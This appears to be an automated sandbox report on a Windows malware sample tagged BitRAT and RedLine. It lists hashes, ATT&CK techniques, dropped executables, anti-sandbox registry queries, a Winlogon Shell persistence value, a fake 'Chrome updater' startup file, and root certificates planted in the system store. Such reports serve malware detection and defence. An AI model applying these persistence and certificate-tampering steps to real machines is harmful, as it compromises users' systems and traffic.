bitrat | e3c21f2f79c6a027881f1b74728c61d4fbb6fe6921f8840ce2dc11aabc9ceaa4

Target

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe
Size

8.8MB
MD5

8b664f8a44dcb056095bc43bcb854c11
SHA1

3f54621b0fd5bb9ae4f20c41fdc937a6654f9269
SHA256

e3c21f2f79c6a027881f1b74728c61d4fbb6fe6921f8840ce2dc11aabc9ceaa4
SHA512

71d2a1359a7ff610d3b64eeeebc406ca2b00139db0b73484a679563eb5424a7fbd194dde7f2cca0cee6f5f240f58f2541e809d2d880dc32b7f6009335e066d51

Score

10^/10

bitrat redline discovery evasion infostealer persistence ransomware spyware trojan

Malware Config

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\222.exe	family_bitrat
\Users\Admin\AppData\Local\Temp\222.exe	family_bitrat
C:\Users\Admin\AppData\Local\Temp\222.exe	family_bitrat
\Users\Admin\AppData\Local\Temp\222.exe	family_bitrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Documents\\updates\\\\xcoreduo.exe,"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3600-184-0x000000000041F526-mapping.dmp	family_redline
behavioral1/memory/3600-183-0x0000000000400000-0x0000000000426000-memory.dmp	family_redline
behavioral1/memory/3600-186-0x0000000000400000-0x0000000000426000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 19 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmpDone.exem.exef.exeflesh.exehello_C# (2).exe222.exehello_C#.exezzz.exezzz2.exetempfl.exezzz2.exeexplorer.exexcoreduo.exerefvs.exexcoreduo.exexcoreduo.exexcoreduo.exexcoreduo.exe

pid	process
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
428	Done.exe
1308	m.exe
1036	f.exe
920	flesh.exe
1844	hello_C# (2).exe
1688	222.exe
1668	hello_C#.exe
968	zzz.exe
568	zzz2.exe
3648	tempfl.exe
3600	zzz2.exe
3908	explorer.exe
3988	xcoreduo.exe
1356	refvs.exe
2480	xcoreduo.exe
2192	xcoreduo.exe
3680	xcoreduo.exe
1840	xcoreduo.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

f.exem.exeflesh.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	flesh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	flesh.exe

Drops startup file 1 IoCs

Processes:

flesh.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe flesh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	flesh.exe

Loads dropped DLL 24 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exeSecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmpDone.execmd.exezzz2.exef.exerundll32.exerundll32.exezzz.exezzz2.exexcoreduo.exerefvs.exexcoreduo.exexcoreduo.exe

pid	process
1056	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.exe
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
2036	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
428	Done.exe
1896	cmd.exe
1896	cmd.exe
1896	cmd.exe
1896	cmd.exe
1896	cmd.exe
1896	cmd.exe
568	zzz2.exe
1036	f.exe
3860	rundll32.exe
3876	rundll32.exe
3128
3128
968	zzz.exe
3600	zzz2.exe
3988	xcoreduo.exe
1356	refvs.exe
2480	xcoreduo.exe
3680	xcoreduo.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

flesh.exem.exef.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	flesh.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	m.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	f.exe

JavaScript code in executable 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\222.exe	js
\Users\Admin\AppData\Local\Temp\222.exe	js
C:\Users\Admin\AppData\Local\Temp\222.exe	js
\Users\Admin\AppData\Local\Temp\222.exe	js

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

m.exef.exeflesh.exe222.exe

pid process

1308 m.exe
1036 f.exe
920 flesh.exe
1688 222.exe
1688 222.exe
1688 222.exe
1688 222.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

zzz2.exe

description pid process target process

PID 568 set thread context of 3600 568 zzz2.exe zzz2.exe

pid	process
1308	m.exe
1036	f.exe
920	flesh.exe
1688	222.exe
1688	222.exe
1688	222.exe
1688	222.exe

description	pid	process	target process
PID 568 set thread context of 3600	568	zzz2.exe	zzz2.exe

Drops file in Program Files directory 11 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp

description	ioc	process
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\is-PCTEL.tmp	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File opened for modification	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File opened for modification	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\flesh.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\is-HT4CK.tmp	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\is-CH7T4.tmp	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\is-EI5FR.tmp	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File opened for modification	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\f.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File opened for modification	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\m.exe	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\unins000.dat	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File created	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\is-6G6D6.tmp	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp
File opened for modification	C:\Program Files (x86)\Margin Trade\Margin\Undelete360\unins000.dat	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.31649.tmp

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_1
\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_2
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_1
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_2
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_1
C:\Program Files (x86)\Margin Trade\Margin\Undelete360\Done.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

flesh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	flesh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	flesh.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3832 timeout.exe
3932 timeout.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

4088 ipconfig.exe
3808 ipconfig.exe

pid	process
3832	timeout.exe
3932	timeout.exe

pid	process
4088	ipconfig.exe
3808	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 189 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "877"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{77754F00-5CCB-11EB-A2D5-E67B5CAEC115} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "871"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "871"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "877"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b660000000002000000000010660000000100002000000081c0049bfeadd8b11db8cbbb99f3866a023115f05f6fdb203b729466fe0a9644000000000e800000000200002000000055d16d54cdbff81b4eca395c3948b92f06a157db12860fb84dd7f7e3e9e0aeec90000000aff86370be2720d80a02bc29dbf0041e047941a91aaea8eecf395a0501aa662807370c4554f8de9c69989978f7e231da4e246f0f11f150eccd0dcf12d185480f44a6d81a3ce920c943daa5602baf05a7c696db2c929a125e24b9364f3a3d47a2cad0c2219595a4813fa7bf47f1ee0b8ad7b47d63b803c6b64949155edefe585c9db09b97a7102763b665d7a51917660740000000c202b0a51e2da8e0178231e6a7e5da0c17bc0fa9960e0d92c8f350165399c38c60273b6b7e055815dda1e300bf610eb2b279cbfacadba54b2382a67f504e77ee	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "7"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "878"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7775EB40-5CCB-11EB-A2D5-E67B5CAEC115} = "0"	iexplore.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

f.exezzz2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	zzz2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	zzz2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0